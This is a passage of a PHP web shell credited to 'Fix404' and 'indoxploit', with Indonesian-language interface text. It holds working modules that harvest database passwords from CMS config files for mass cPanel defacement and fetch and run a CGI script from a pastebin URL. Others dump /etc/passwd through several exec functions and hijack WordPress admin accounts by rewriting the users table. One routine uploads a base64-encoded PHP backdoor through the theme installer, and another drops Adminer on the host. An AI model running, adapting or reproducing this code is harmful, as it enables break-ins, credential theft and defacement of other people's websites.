3445.                                         } else {
3446.                                             preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
3447.                                             foreach($domains_cp[1] as $dj) {
3448.                                                 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
3449.                                                 $user_cp_url = $user_cp_url['name'];
3450.                                                 if($user_cp_url == $ucp) {
3451.                                                     echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
3452.                                                     break;
3453.                                                 }
3454.                                             }
3455.                                         }
3456.                                     } else {
3457.                                         echo "[+] <font color=white>gabisa ambil nama domain nya</font><br><br>";
3458.                                     }
3459.                                 } else {
3460.                                     echo "[-] <font color=white>Deface Gagal</font><br><br>";
3461.                                 }
3462.                             }
3463.                             //echo "username (<font color=aqua>$ucp</font>) password (<font color=aqua>$pcp</font>)<br>";
3464.                         }
3465.                     }
3466.                 }
3467.             }
3468.         }
3469.         if($i == 0) {
3470.         } else {
3471.             echo "<br>Sukses Deface ".$i." Cpanel by <font color=aqua>Fix404.</font>";
3472.         }
3473.     } else {
3474.         echo "<center>
3475.         <form method='post'>
3476.         Filename: <br>
3477.         <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
3478.         Deface Page: <br>
3479.         <input type='text' name='deface' placeholder='http://www.web-yang-udah-do-deface.com/filemu.php' style='width: 450px;'><br>
3480.         USER: <br>
3481.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
3482.         $_usercp = fopen("/etc/passwd","r");
3483.         while($getu = fgets($_usercp)) {
3484.             if($getu == '' || !$_usercp) {
3485.                 echo "<font color=white>Can't read /etc/passwd</font>";
3486.             } else {
3487.                 preg_match_all("/(.*?):x:/", $getu, $u);
3488.                 foreach($u[1] as $user_cp) {
3489.                         if(is_dir("/home/$user_cp/public_html")) {
3490.                             echo "$user_cp\n";
3491.                     }
3492.                 }
3493.             }
3494.         }
3495.         echo "</textarea><br>
3496.         PASS: <br>
3497.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
3498.         function cp_pass($dir) {
3499.             $pass = "";
3500.             $dira = scandir($dir);
3501.             foreach($dira as $dirb) {
3502.                 if(!is_file("$dir/$dirb")) continue;
3503.                 $ambil = file_get_contents("$dir/$dirb");
3504.                 if(preg_match("/WordPress/", $ambil)) {
3505.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
3506.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
3507.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
3508.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
3509.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
3510.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
3511.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
3512.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
3513.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
3514.                 } elseif(preg_match("/client/", $ambil)) {
3515.                     preg_match("/password=(.*)/", $ambil, $pass1);
3516.                     if(preg_match('/"/', $pass1[1])) {
3517.                         $pass1[1] = str_replace('"', "", $pass1[1]);
3518.                         $pass .= $pass1[1]."\n";
3519.                     }
3520.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
3521.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
3522.                 }
3523.             }
3524.             echo $pass;
3525.         }
3526.         $cp_pass = cp_pass($dir);
3527.         echo $cp_pass;
3528.         echo "</textarea><br>
3529.         <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
3530.         </form>
3531.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
3532.     }
3533. }
3534.  elseif($_GET['do'] == 'cgi') {
3535.     $cgi_dir = mkdir('idx_cgi', 0755);
3536.     $file_cgi = "idx_cgi/cgi.izo";
3537.     $isi_htcgi = "AddHandler cgi-script .izo";
3538.     $htcgi = fopen(".htaccess", "w");
3539.     $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
3540.     $cgi = fopen($file_cgi, "w");
3541.     fwrite($cgi, $cgi_script);
3542.     fwrite($htcgi, $isi_htcgi);
3543.     chmod($file_cgi, 0755);
3544.     echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
3545. } elseif($_GET['do'] == 'fake_root') {
3546.     ob_start();
3547.     function reverse($url) {
3548.         $ch = curl_init("http://domains.yougetsignal.com/domains.php");
3549.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
3550.               curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
3551.               curl_setopt($ch, CURLOPT_HEADER, 0);
3552.               curl_setopt($ch, CURLOPT_POST, 1);
3553.         $resp = curl_exec($ch);
3554.         $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
3555.         $array = explode(",,", $resp);
3556.         unset($array[0]);
3557.         foreach($array as $lnk) {
3558.             $lnk = "http://$lnk";
3559.             $lnk = str_replace(",", "", $lnk);
3560.             echo $lnk."\n";
3561.             ob_flush();
3562.             flush();
3563.         }
3564.               curl_close($ch);
3565.     }
3566.     function cek($url) {
3567.         $ch = curl_init($url);
3568.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
3569.               curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
3570.         $resp = curl_exec($ch);
3571.         return $resp;
3572.     }
3573.     $cwd = getcwd();
3574.     $ambil_user = explode("/", $cwd);
3575.     $user = $ambil_user[2];
3576.     if($_POST['reverse']) {
3577.         $site = explode("\r\n", $_POST['url']);
3578.         $file = $_POST['file'];
3579.         foreach($site as $url) {
3580.             $cek = cek("$url/~$user/$file");
3581.             if(preg_match("/hacked/i", $cek)) {
3582.                 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=aqua>Fake Root!</font><br>";
3583.             }
3584.         }
3585.     } else {
3586.         echo "<center><form method='post'>
3587.         Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
3588.         User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
3589.         Domain: <br>
3590.         <textarea style='width: 450px; height: 250px;' name='url'>";
3591.         reverse($_SERVER['HTTP_HOST']);
3592.         echo "</textarea><br>
3593.         <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
3594.         </form><br>
3595.         NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
3596.     }
3597. } elseif($_GET['do'] == 'adminer') {
3598.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
3599.     function adminer($url, $isi) {
3600.         $fp = fopen($isi, "w");
3601.         $ch = curl_init();
3602.               curl_setopt($ch, CURLOPT_URL, $url);
3603.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
3604.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
3605.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
3606.               curl_setopt($ch, CURLOPT_FILE, $fp);
3607.         return curl_exec($ch);
3608.               curl_close($ch);
3609.         fclose($fp);
3610.         ob_flush();
3611.         flush();
3612.     }
3613.     if(file_exists('adminer.php')) {
3614.         echo "<center><font color=aqua><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
3615.     } else {
3616.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
3617.             echo "<center><font color=aqua><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
3618.         } else {
3619.             echo "<center><font color=white>gagal buat file adminer</font></center>";
3620.         }
3621.     }
3622. }elseif($_GET['do'] == 'passwbypass') {
3623.     echo '<center>Bypass etc/passw With:<br>
3624. <table style="width:50%">
3625.  <tr>
3626.    <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
3627.    <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
3628.     <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>  
3629.     <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>      
3630.    <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
3631. </tr></table>Bypass User With : <table style="width:50%">
3632. <tr>
3633.    <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
3634.    <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
3635.     <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>  
3636.     <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>      
3637.    <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
3638. </tr>
3639. </table><br>';
3640.  
3641.  
3642. if ($_POST['awkuser']) {
3643. echo"<textarea class='inputzbut' cols='65' rows='15'>";
3644. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
3645. echo "</textarea><br>";
3646. }
3647. if ($_POST['systuser']) {
3648. echo"<textarea class='inputzbut' cols='65' rows='15'>";
3649. echo system("ls /var/mail");
3650. echo "</textarea><br>";
3651. }
3652. if ($_POST['passthuser']) {
3653. echo"<textarea class='inputzbut' cols='65' rows='15'>";
3654. echo passthru("ls /var/mail");
3655. echo "</textarea><br>";
3656. }
3657. if ($_POST['exuser']) {
3658. echo"<textarea class='inputzbut' cols='65' rows='15'>";
3659. echo exec("ls /var/mail");
3660. echo "</textarea><br>";
3661. }
3662. if ($_POST['shexuser']) {
3663. echo"<textarea class='inputzbut' cols='65' rows='15'>";
3664. echo shell_exec("ls /var/mail");
3665. echo "</textarea><br>";
3666. }
3667. if($_POST['syst'])
3668. {
3669. echo"<textarea class='inputz' cols='65' rows='15'>";
3670. echo system("cat /etc/passwd");
3671. echo"</textarea><br><br><b></b><br>";
3672. }
3673. if($_POST['passth'])
3674. {
3675. echo"<textarea class='inputz' cols='65' rows='15'>";
3676. echo passthru("cat /etc/passwd");
3677. echo"</textarea><br><br><b></b><br>";
3678. }
3679. if($_POST['ex'])
3680. {
3681. echo"<textarea class='inputz' cols='65' rows='15'>";
3682. echo exec("cat /etc/passwd");
3683. echo"</textarea><br><br><b></b><br>";
3684. }
3685. if($_POST['shex'])
3686. {
3687. echo"<textarea class='inputz' cols='65' rows='15'>";
3688. echo shell_exec("cat /etc/passwd");
3689. echo"</textarea><br><br><b></b><br>";
3690. }
3691. echo '<center>';
3692. if($_POST['melex'])
3693. {
3694. echo"<textarea class='inputz' cols='65' rows='15'>";
3695. for($uid=0;$uid<60000;$uid++){
3696. $ara = posix_getpwuid($uid);
3697. if (!empty($ara)) {
3698. while (list ($key, $val) = each($ara)){
3699. print "$val:";
3700. }
3701. print "\n";
3702. }
3703. }
3704. echo"</textarea><br><br>";
3705. }
3706. //
3707.  
3708. //
3709. } elseif($_GET['do'] == 'auto_dwp') {
3710.     if($_POST['auto_deface_wp']) {
3711.         function anucurl($sites) {
3712.             $ch = curl_init($sites);
3713.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3714.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3715.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3716.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
3717.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
3718.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
3719.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
3720.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
3721.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
3722.             $data = curl_exec($ch);
3723.                   curl_close($ch);
3724.             return $data;
3725.         }
3726.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
3727.             $post = array(
3728.                    "log" => "$userr",
3729.                    "pwd" => "$pass",
3730.                    "rememberme" => "forever",
3731.                    "wp-submit" => "$wp_submit",
3732.                    "whiteirect_to" => "$web",
3733.                    "testcookie" => "1",
3734.                    );
3735.             $ch = curl_init($cek);
3736.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3737.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3738.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3739.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
3740.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
3741.                   curl_setopt($ch, CURLOPT_POST, 1);
3742.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
3743.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
3744.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
3745.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
3746.             $data = curl_exec($ch);
3747.                   curl_close($ch);
3748.             return $data;
3749.         }
3750.         $scan = $_POST['link_config'];
3751.         $link_config = scandir($scan);
3752.         $script = htmlspecialchars($_POST['script']);
3753.         $user = "Fix404";
3754.         $pass = "Fix404";
3755.         $passx = md5($pass);
3756.         foreach($link_config as $dir_config) {
3757.             if(!is_file("$scan/$dir_config")) continue;
3758.             $config = file_get_contents("$scan/$dir_config");
3759.             if(preg_match("/WordPress/", $config)) {
3760.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
3761.                 $dbuser = ambilkata($config,"DB_USER', '","'");
3762.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
3763.                 $dbname = ambilkata($config,"DB_NAME', '","'");
3764.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
3765.                 $prefix = $dbprefix."users";
3766.                 $option = $dbprefix."options";
3767.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3768.                 $db = mysql_select_db($dbname);
3769.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
3770.                 $result = mysql_fetch_array($q);
3771.                 $id = $result[ID];
3772.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
3773.                 $result2 = mysql_fetch_array($q2);
3774.                 $target = $result2[option_value];
3775.                 if($target == '') {                
3776.                     echo "[-] <font color=white>error, gabisa ambil nama domain nya</font><br>";
3777.                 } else {
3778.                     echo "[+] $target <br>";
3779.                 }
3780.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
3781.                 if(!$conn OR !$db OR !$update) {
3782.                     echo "[-] MySQL Error: <font color=white>".mysql_error()."</font><br><br>";
3783.                     mysql_close($conn);
3784.                 } else {
3785.                     $site = "$target/wp-login.php";
3786.                     $site2 = "$target/wp-admin/theme-install.php?upload";
3787.                     $b1 = anucurl($site2);
3788.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
3789.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
3790.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
3791.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
3792.                     $www = "m.php";
3793.                     $fp5 = fopen($www,"w");
3794.                     fputs($fp5,$upload3);
3795.                     $post2 = array(
3796.                             "_wpnonce" => "$anu2",
3797.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
3798.                             "themezip" => "@$www",
3799.                             "install-theme-submit" => "Install Now",
3800.                             );
3801.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
3802.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3803.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3804.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
3805.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
3806.                           curl_setopt($ch, CURLOPT_POST, 1);
3807.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
3808.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
3809.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
3810.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
3811.                     $data3 = curl_exec($ch);
3812.                           curl_close($ch);
3813.                     $y = date("Y");
3814.                     $m = date("m");
3815.                     $namafile = "id.php";
3816.                     $fpi = fopen($namafile,"w");
3817.                     fputs($fpi,$script);
3818.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
3819.                            curl_setopt($ch6, CURLOPT_POST, true);
3820.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
3821.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
3822.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
3823.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
3824.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
3825.                     $postResult = curl_exec($ch6);
3826.                            curl_close($ch6);
3827.                     $as = "$target/k.php";
3828.                     $bs = anucurl($as);
3829.                     if(preg_match("#$script#is", $bs)) {
3830.                         echo "[+] <font color='aqua'>berhasil mepes...</font><br>";
3831.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
3832.                         } else {
3833.                         echo "[-] <font color='white'>gagal mepes...</font><br>";
3834.                         echo "[!!] coba aja manual: <br>";
3835.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
3836.                         echo "[+] username: <font color=aqua>$user</font><br>";
3837.                         echo "[+] password: <font color=aqua>$pass</font><br><br>";    
3838.                         }
3839.                     mysql_close($conn);
3840.                 }
3841.             }
3842.         }
3843.     } else {
3844.         echo "<center><h1>WordPress Auto Deface</h1>
3845.         <form method='post'>
3846.         <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
3847.         <input type='text' name='script' height='10' size='50' placeholder='Hacked By Fix404' requiwhite><br>
3848.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
3849.         </form>
3850.         <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
3851.         </center>";
3852.     }
3853. } elseif($_GET['do'] == 'auto_dwp2') {
3854.     if($_POST['auto_deface_wp']) {
3855.         function anucurl($sites) {
3856.             $ch = curl_init($sites);
3857.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3858.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3859.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3860.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
3861.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
3862.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
3863.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
3864.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
3865.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
3866.             $data = curl_exec($ch);
3867.                   curl_close($ch);
3868.             return $data;
3869.         }
3870.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
3871.             $post = array(
3872.                    "log" => "$userr",
3873.                    "pwd" => "$pass",
3874.                    "rememberme" => "forever",
3875.                    "wp-submit" => "$wp_submit",
3876.                    "whiteirect_to" => "$web",
3877.                    "testcookie" => "1",
3878.                    );
3879.             $ch = curl_init($cek);
3880.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3881.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3882.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3883.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
3884.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
3885.                   curl_setopt($ch, CURLOPT_POST, 1);
3886.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
3887.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
3888.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
3889.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
3890.             $data = curl_exec($ch);
3891.                   curl_close($ch);
3892.             return $data;
3893.         }
3894.         $link = explode("\r\n", $_POST['link']);
3895.         $script = htmlspecialchars($_POST['script']);
3896.         $user = "indoxploit";
3897.         $pass = "indoxploit";
3898.         $passx = md5($pass);
3899.         foreach($link as $dir_config) {
3900.             $config = anucurl($dir_config);
3901.             $dbhost = ambilkata($config,"DB_HOST', '","'");
3902.             $dbuser = ambilkata($config,"DB_USER', '","'");
3903.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
3904.             $dbname = ambilkata($config,"DB_NAME', '","'");
3905.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
3906.             $prefix = $dbprefix."users";
3907.             $option = $dbprefix."options";
3908.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3909.             $db = mysql_select_db($dbname);
3910.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
3911.             $result = mysql_fetch_array($q);
3912.             $id = $result[ID];
3913.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
3914.             $result2 = mysql_fetch_array($q2);
3915.             $target = $result2[option_value];
3916.             if($target == '') {                
3917.                 echo "[-] <font color=white>error, gabisa ambil nama domain nya</font><br>";
3918.             } else {
3919.                 echo "[+] $target <br>";
3920.             }
3921.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
3922.             if(!$conn OR !$db OR !$update) {
3923.                 echo "[-] MySQL Error: <font color=white>".mysql_error()."</font><br><br>";
3924.                 mysql_close($conn);
3925.             } else {
3926.                 $site = "$target/wp-login.php";
3927.                 $site2 = "$target/wp-admin/theme-install.php?upload";
3928.                 $b1 = anucurl($site2);
3929.                 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
3930.                 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
3931.                 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
3932.                 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
3933.                 $www = "m.php";
3934.                 $fp5 = fopen($www,"w");
3935.                 fputs($fp5,$upload3);
3936.                 $post2 = array(
3937.                         "_wpnonce" => "$anu2",
3938.                         "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
3939.                         "themezip" => "@$www",
3940.                         "install-theme-submit" => "Install Now",
3941.                         );
3942.                 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
3943.                       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3944.                       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3945.                       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
3946.                       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
3947.                       curl_setopt($ch, CURLOPT_POST, 1);
3948.                       curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
3949.                       curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
3950.                       curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
3951.                       curl_setopt($ch, CURLOPT_COOKIESESSION, true);
3952.                 $data3 = curl_exec($ch);
3953.                       curl_close($ch);
3954.                 $y = date("Y");
3955.                 $m = date("m");
3956.                 $namafile = "id.php";
3957.                 $fpi = fopen($namafile,"w");
3958.                 fputs($fpi,$script);
3959.                 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
3960.                        curl_setopt($ch6, CURLOPT_POST, true);
3961.                        curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
3962.                        curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
3963.                        curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
3964.                        curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
3965.                        curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
3966.                 $postResult = curl_exec($ch6);
3967.                        curl_close($ch6);
3968.                 $as = "$target/k.php";
3969.                 $bs = anucurl($as);
3970.                 if(preg_match("#$script#is", $bs)) {
3971.                     echo "[+] <font color='aqua'>berhasil mepes...</font><br>";
3972.                     echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
3973.                     } else {
3974.                     echo "[-] <font color='white'>gagal mepes...</font><br>";
3975.                     echo "[!!] coba aja manual: <br>";
3976.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
3977.                     echo "[+] username: <font color=aqua>$user</font><br>";
3978.                     echo "[+] password: <font color=aqua>$pass</font><br><br>";    
3979.                     }
3980.                 mysql_close($conn);
3981.             }
3982.         }
3983.     } else {
3984.         echo "<center><h1>WordPress Auto Deface V.2</h1>
3985.         <form method='post'>
3986.         Link Config: <br>
3987.         <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
3988.         <input type='text' name='script' height='10' size='50' placeholder='Hacked By Fix404' requiwhite><br>
3989.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
3990.         </form></center>";
3991.     }
3992. } elseif($_GET['act'] == 'newfile') {
3993.     if($_POST['new_save_file']) {
3994.         $newfile = htmlspecialchars($_POST['newfile']);
3995.         $fopen = fopen($newfile, "a+");
3996.         if($fopen) {
3997.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
3998.         } else {
3999.             $act = "<font color=white>permission denied</font>";
4000.         }
4001.     }
4002.     echo $act;
4003.     echo "<form method='post'>
4004.     Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
4005.     <input type='submit' name='new_save_file' value='Submit'>
4006.     </form>";
4007. } elseif($_GET['act'] == 'newfolder') {
4008.     if($_POST['new_save_folder']) {
4009.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
4010.         if(!mkdir($new_folder)) {
4011.             $act = "<font color=white>permission denied</font>";
4012.         } else {
4013.             $act = "<script>window.location='?dir=".$dir."';</script>";
4014.         }
4015.     }
4016.     echo $act;
4017.     echo "<form method='post'>
4018.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
4019.     <input type='submit' name='new_save_folder' value='Submit'>
4020.     </form>";
4021. } elseif($_GET['act'] == 'rename_dir') {
4022.     if($_POST['dir_rename']) {
4023.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
4024.         if($dir_rename) {
4025.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
4026.         } else {
4027.             $act = "<font color=white>permission denied</font>";
4028.         }
4029.     echo "".$act."<br>";
4030.     }
4031.     echo "<form method='post'>
4032.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
4033.     <input type='submit' name='dir_rename' value='rename'>
4034.     </form>";
4035. } elseif($_GET['act'] == 'delete_dir') {
4036.     function Delete($path)
4037. {
4038.     if (is_dir($path) === true)
4039.     {
4040.         $files = array_diff(scandir($path), array('.', '..'));
4041.         foreach ($files as $file)
4042.         {
4043.             Delete(realpath($path) . '/' . $file);
4044.         }
4045.         return rmdir($path);
4046.     }
4047.     else if (is_file($path) === true)
4048.     {
4049.         return unlink($path);
4050.     }
4051.     return false;
4052. }
4053.     $delete_dir = Delete($dir);
4054.     if($delete_dir) {
4055.         $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
4056.     } else {
4057.         $act = "<font color=white>could not remove ".basename($dir)."</font>";
4058.     }
4059.     echo $act;
4060. } elseif($_GET['act'] == 'view') {
